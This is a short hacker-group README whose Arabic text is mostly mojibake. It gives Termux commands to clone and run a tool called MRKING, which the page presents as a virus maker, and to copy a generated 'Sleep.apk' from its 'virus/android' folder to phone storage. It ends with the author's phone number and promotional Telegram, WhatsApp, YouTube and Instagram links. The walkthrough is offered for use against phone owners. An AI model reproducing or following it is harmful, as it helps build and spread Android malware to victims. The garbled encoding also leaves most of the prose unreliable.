# Hacker-Leadership-Canaan-
ุตูุน ูููุงุช ูุฑูุชู ูู ูุจู ุงูููุฑ ุงูููุงุฏู ููุนุงู 

โุดเขชุญ  ูููืพ ูููููููู๏ฌธโ:
๐ค ุง๏ป๏ป๏ปณุงืู ฺณู๏ปจ๏ปุง๏ฌธ๐ค๐โ๐ฟ๐ฆ๐ฑ.
@abdlhanan
+967738489560
https://t.me/O_opl

ุงุฏุงู ุตูุงุนู ููุฑูุณ ููุฑูุงุช ุนูู ุดูู ุงููุงุชุณ ูุงูููุณ MRKing:

pkg install git

git clone https://github.com/king-hacking/MRKING

cd MRKING

ls

bash install.sh

2

Y

ุจุนุฏูุง ุชูุชุญ ูุงูุฐุฉ ุฌุฏูุฏุฉ ูุชูุชุจ
cd MRKING
ls
./MRKING.sh
2
1
2
ุจุนุฏ ูุง ููุดุฃ ุงูุชุทุจูู ุชูุชุญูู ูุงูุฐุฉ ุฌุฏูุฏุฉ ูุชูุชุจูู

ls
cd MRKING
cd virus
ls
cd android 
ููุง ุชุฎุชุงุฑ ุงูููู ุชุฑูุฏ ุชูููู ููุฑุงู ุงู ููุฌูุงุฒ 
mv Sleep.apk /sdcard
ุงู
mv Sleep.apk $HOME 
ุจููุนุฏู ูุง ูููู ููุงุฌูุฉ ุชูุฑููุณ ุชูููู ูุฐุงูุฑุฉ ุงูุฌูุงุฒ
mv Sleep.apk storage
cd storage
mv Sleep.apk download


ุฃูููููููููู๐จ๐ปโ๐ปูููุขืูู ูููู๏ฌธููู๐พ๐ชููุนูููุข๏ฌธ๐ฌ๐ฅ


ูุตุฏุฑ ุงูุดุฑูุญุงุช: ๐ฑ


ูุตุฏุฑ ููุงุชู ุชูุฌุฑุงู ุงูุงุณุงุณูู ูุงูุฑุณููู:::โ๏ธ
https://t.me/O_opl
ูุตุฏุฑ ููุงุชู ุชูุฌุฑุงู:: 
https://t.me/Canaanleadership

ูุตุฏุฑ ุจูุช ุชูุฌุฑุงู:::

http://t.me/abdlhanan135BOT


ูุตุฏุฑ ููุงุชู ุชูุฌุฑุงู ุงูุซุงููู:: 
https://t.me/+FsAeA-sKWOk1ZDVl

ูุตุฏุฑ ููุงุชู ูุงุชุณุงุจ:: 
https://whatsapp.com/channel/0029Vb4FgvHAYlUP2s3Voi06

ูุตุฏุฑ ููุงุชู ูุงุชุณุงุจ ุงูุซุงููู:: 
https://whatsapp.com/channel/0029VbB3dxfLSmbjYMTTGa3F
ูุตุฏุฑ ูุฑูุจู ุนูู ูุงุชุณุงุจ::
https://chat.whatsapp.com/CN4GGB887zZLvsHQVROLHn?mode=ems_copy_t

ูุตุฏุฑ ููุงุชู ููุชููุจ:: 
https://youtube.com/channel/UCpNVehAXnpT8l4YnOt8azaA?si=DlvxejXDBE_Zw5YV
ูุตุฏุฑ ููุงุชู ุงูุณุชุบุฑุงู::: 
https://www.instagram.com/gt._nh?igsh=MW1mMmM4MXMyMjdyZw==
ููุฏูู ูู::: 
๐ค ุง๏ป๏ป๏ปณุงืู ฺณู๏ปจ๏ปุง๏ฌธ๐ค๐โ๐ฟ๐ฆ๐ฑ.

ุงุชูุงุตู ูุน ุงููุทูุฑ ุชูุฌุฑุงู ุงูููุงุฏู ููุนุงู:: 
@abdlhanan

ูุงุชุบูุฑ ุงููุตุฏุฑ ูุงูุช ูุงูุชุจุชู ููุง ุณููุชู ูุฐุง ูุฏู ุนูู ูุดูู โ๏ธ
ูุฌู ูุบูุฑู ูุณุชููุฏ๐
